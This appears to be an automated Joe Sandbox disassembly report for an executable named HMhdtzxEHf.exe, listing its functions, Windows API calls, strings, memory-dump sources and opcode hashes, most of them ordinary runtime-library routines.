                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemText$DialogWindow
                                                                                            • String ID: RENAMEDLG
                                                                                            • API String ID: 445417207-3299779563
                                                                                            • Opcode ID: fa0f20b60332b36ed003a03b24a642beef2b70a51c4e1c95a54ba14356c89cd3
                                                                                            • Instruction ID: 8e1ae6a9ecaa657c0f7d9f381039e58ecf1bbc7e2f8a5bf3ae7b3df067dc5b04
                                                                                            • Opcode Fuzzy Hash: fa0f20b60332b36ed003a03b24a642beef2b70a51c4e1c95a54ba14356c89cd3
                                                                                            • Instruction Fuzzy Hash: B8012837395210BEDA108FA99D09F57BB7CEBDAB01F120411F305A20D0CBA29A168779
                                                                                            Function 00A57E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A57E24,00000000,?,00A57DC4,00000000,00A6C300,0000000C,00A57F1B,00000000,00000002), ref: 00A57E93
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A57EA6
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A57E24,00000000,?,00A57DC4,00000000,00A6C300,0000000C,00A57F1B,00000000,00000002), ref: 00A57EC9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 165cc919ced9519685c17504e77f389f66d5a67ea941f4bb20159de4611ec821
                                                                                            • Instruction ID: 0e9c1c7218021a7e9317a46875a2cbc97626ad8b023cf05faf3e5b5719028a17
                                                                                            • Opcode Fuzzy Hash: 165cc919ced9519685c17504e77f389f66d5a67ea941f4bb20159de4611ec821
                                                                                            • Instruction Fuzzy Hash: 35F04475904208BBCF11DFA4DC09B9EBFB8FF44712F0141A9FC05A2150DB709E46CA90
                                                                                            Function 00A3F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
                                                                                              • Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858
                                                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A3F2E4
                                                                                            • GetProcAddress.KERNEL32(00A781C8,CryptUnprotectMemory), ref: 00A3F2F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                            • API String ID: 2141747552-1753850145
                                                                                            • Opcode ID: 07bf4e3d53dd03045b02a044e576cec05bbb4bafb7165c380beba12a76e791b5
                                                                                            • Instruction ID: e63cabf037f14114c0c71698a41b24b1f370ca00f4844991d23aafe3fb726ca0
                                                                                            • Opcode Fuzzy Hash: 07bf4e3d53dd03045b02a044e576cec05bbb4bafb7165c380beba12a76e791b5
                                                                                            • Instruction Fuzzy Hash: 94E04F76924702AECF219BB49949B42BAF46F24740F14881DF0DB93680DAB5D5429B50
                                                                                            Function 00A52BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustPointer$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 2252061734-0
                                                                                            • Opcode ID: 8946dc18ce6e033f656794d9e7328ff5bfbd74504f2857c38df8ac24181b2ea3
                                                                                            • Instruction ID: 7083c9166b33f1f8a73bef69018d00527a4fc34cf2cb5d97fcb2418123764144
                                                                                            • Opcode Fuzzy Hash: 8946dc18ce6e033f656794d9e7328ff5bfbd74504f2857c38df8ac24181b2ea3
                                                                                            • Instruction Fuzzy Hash: B251E173600212AFDB298F14D945BBA77B4FF56312F24452DEC06476A2E731ED88D790
                                                                                            Function 00A5BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00A5BF39
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A5BF5C
                                                                                              • Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A5BF82
                                                                                            • _free.LIBCMT ref: 00A5BF95
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A5BFA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: 0efa27af7123bed1eae09394ef59bcb36aee646b81e6017a0a983ef9e2baf378
                                                                                            • Instruction ID: c6fd3073d4c3db05e69a4814312585379d0a41aa31d5e1c74b4ad06327f28366
                                                                                            • Opcode Fuzzy Hash: 0efa27af7123bed1eae09394ef59bcb36aee646b81e6017a0a983ef9e2baf378
                                                                                            • Instruction Fuzzy Hash: 92015EB26256157F2B2156A65C49C7B6A7DFAC3BA33140229FD05D2141EB70CD0A95B0
                                                                                            Function 00A59869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,?,00A591AD,00A5B188,?,00A59813,00000001,00000364,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A5986E
                                                                                            • _free.LIBCMT ref: 00A598A3
                                                                                            • _free.LIBCMT ref: 00A598CA
                                                                                            • SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A598D7
                                                                                            • SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A598E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: 4602bd4314ff79349fead3108a6157ec678f47687a16411025e2e4f6a2ade4f9
                                                                                            • Instruction ID: b0eb2aaf1d08bb3177f89006573c5f1830d2302f256b22f851c1922019bb4a2b
                                                                                            • Opcode Fuzzy Hash: 4602bd4314ff79349fead3108a6157ec678f47687a16411025e2e4f6a2ade4f9
                                                                                            • Instruction Fuzzy Hash: C101F437244701FBC612A7A46D8595B25BAFFE37737210134FD19AA192EF748C0F5261
                                                                                            Function 00A40EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A411CF: ResetEvent.KERNEL32(?), ref: 00A411E1
                                                                                              • Part of subcall function 00A411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A411F5
                                                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A40F21
                                                                                            • CloseHandle.KERNEL32(?,?), ref: 00A40F3B
                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00A40F54
                                                                                            • CloseHandle.KERNEL32(?), ref: 00A40F60
                                                                                            • CloseHandle.KERNEL32(?), ref: 00A40F6C
                                                                                              • Part of subcall function 00A40FE4: WaitForSingleObject.KERNEL32(?,000000FF,00A41206,?), ref: 00A40FEA
                                                                                              • Part of subcall function 00A40FE4: GetLastError.KERNEL32(?), ref: 00A40FF6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                            • String ID:
                                                                                            • API String ID: 1868215902-0
                                                                                            • Opcode ID: 0b8428deb76b75b5606b960dec121ab65212a9f5bcde9cb9a0d6de9b4be4e7d0
                                                                                            • Instruction ID: ac3cd8e30559c1e3052dc408bf67659f28ab01cb81a5d668d59411b558915c1d
                                                                                            • Opcode Fuzzy Hash: 0b8428deb76b75b5606b960dec121ab65212a9f5bcde9cb9a0d6de9b4be4e7d0
                                                                                            • Instruction Fuzzy Hash: 1D015276100744FFCB229BA4DD84FC6BBB9FB48710F004929F25B52160C7B57A5ADB50
                                                                                            Function 00A5C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00A5C817
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A5C829
                                                                                            • _free.LIBCMT ref: 00A5C83B
                                                                                            • _free.LIBCMT ref: 00A5C84D
                                                                                            • _free.LIBCMT ref: 00A5C85F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 3e5d9eb28b3fd18537b8c33d3738f6c7bc3a01471ba9e7e3c63d0c9216700299
                                                                                            • Instruction ID: 9e8119fd135bbfc8d144ce3538472b8f6ed7a07ffdf27700212aa056fb387b81
                                                                                            • Opcode Fuzzy Hash: 3e5d9eb28b3fd18537b8c33d3738f6c7bc3a01471ba9e7e3c63d0c9216700299
                                                                                            • Instruction Fuzzy Hash: 86F01D33504304BFC620EBA8F986C1A73F9FA10B267641819F908E7556CFB5FC89CA64
                                                                                            Function 00A41FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00A41FE5
                                                                                            • _wcslen.LIBCMT ref: 00A41FF6
                                                                                            • _wcslen.LIBCMT ref: 00A42006
                                                                                            • _wcslen.LIBCMT ref: 00A42014
                                                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00A3B371,?,?,00000000,?,?,?), ref: 00A4202F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$CompareString
                                                                                            • String ID:
                                                                                            • API String ID: 3397213944-0
                                                                                            • Opcode ID: bb7a95d520a15363a1860fc844ee417261fb7f3c2cb63895601bc809251c426d
                                                                                            • Instruction ID: ee9a1055c6e4b5b64a61c054be8800537aa2fd6f0bacb8b7067d213db8f8fdab
                                                                                            • Opcode Fuzzy Hash: bb7a95d520a15363a1860fc844ee417261fb7f3c2cb63895601bc809251c426d
                                                                                            • Instruction Fuzzy Hash: DEF01D33408014BBCF225F91EC0AECA7FA6EBC47A1B118415FE1A5B061CB729A65D790
                                                                                            Function 00A58900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00A5891E
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A58930
                                                                                            • _free.LIBCMT ref: 00A58943
                                                                                            • _free.LIBCMT ref: 00A58954
                                                                                            • _free.LIBCMT ref: 00A58965
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 1cab0000497ef747763ce9ec309d66d603dc95d8e04b62cb1131347477e24d2d
                                                                                            • Instruction ID: e8f11ca1d340db5a2d61956db6089867d26af25e0b57bbff28ab4c6b8cb3bc5e
                                                                                            • Opcode Fuzzy Hash: 1cab0000497ef747763ce9ec309d66d603dc95d8e04b62cb1131347477e24d2d
                                                                                            • Instruction Fuzzy Hash: 35F03A76A11126ABC706EF94FD025453BF1F7247113000507F914662B2DF7A494BDB81
                                                                                            Function 00A415FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _swprintf
                                                                                            • String ID: %ls$%s: %s
                                                                                            • API String ID: 589789837-2259941744
                                                                                            • Opcode ID: 53d2680e695a5f32fbe7328e86f6103365cb8766bbb78399b70154a9edf1a803
                                                                                            • Instruction ID: 7cccfdf2e370946a897e55b233290730ab853f7e35f67632a32dd83597d3a854
                                                                                            • Opcode Fuzzy Hash: 53d2680e695a5f32fbe7328e86f6103365cb8766bbb78399b70154a9edf1a803
                                                                                            • Instruction Fuzzy Hash: 0251EB3D388300F6F6215B908E87F35B6B6AB85B05F244506F396644E1DAA2E4D0AB1B
                                                                                            Function 00A57F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HMhdtzxEHf.exe,00000104), ref: 00A57FAE
                                                                                            • _free.LIBCMT ref: 00A58079
                                                                                            • _free.LIBCMT ref: 00A58083
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                            • API String ID: 2506810119-2306939241
                                                                                            • Opcode ID: fa6ca5ec15ecd4a6c46f8c6f57235efe7dd97c042323c45ceb1077bc1523478d
                                                                                            • Instruction ID: 557eb389c0ee9ae978ce9060ada13c0853922d8a0eb23303bf74a3c70f0e7120
                                                                                            • Opcode Fuzzy Hash: fa6ca5ec15ecd4a6c46f8c6f57235efe7dd97c042323c45ceb1077bc1523478d
                                                                                            • Instruction Fuzzy Hash: 6831BFB1A00218AFCB21DF94988499EBBFCFF94302F104066FD04A7251DA748E49CBA1
                                                                                            Function 00A531D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A531FB
                                                                                            • _abort.LIBCMT ref: 00A53306
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: EncodePointer_abort
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 948111806-2084237596
                                                                                            • Opcode ID: aa2e73bf74ffa075d0bc8776c05302860ada2c3d96b5256d077a10671786b577
                                                                                            • Instruction ID: fa9b3e98fd81623d6dc5975f9d2a6b7c0cc438cd2f5d9f9daed93c912b880cea
                                                                                            • Opcode Fuzzy Hash: aa2e73bf74ffa075d0bc8776c05302860ada2c3d96b5256d077a10671786b577
                                                                                            • Instruction Fuzzy Hash: 4D416772900209AFDF15DF98CD81AEEBBB9BF88345F188059FD08A7221D335AA54DB51
                                                                                            Function 00A37401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A37406
                                                                                              • Part of subcall function 00A33BBA: __EH_prolog.LIBCMT ref: 00A33BBF
                                                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00A374CD
                                                                                              • Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
                                                                                              • Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
                                                                                              • Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                            • API String ID: 3813983858-639343689
                                                                                            • Opcode ID: c4217dda2d6c246620cd3ce1a5651d990f23bc9a5fe292ad5da8312e826acc61
                                                                                            • Instruction ID: 265e360f978c3f9d1de6d419bd852e5fe44f20b90e7f88af4220504d7639a15d
                                                                                            • Opcode Fuzzy Hash: c4217dda2d6c246620cd3ce1a5651d990f23bc9a5fe292ad5da8312e826acc61
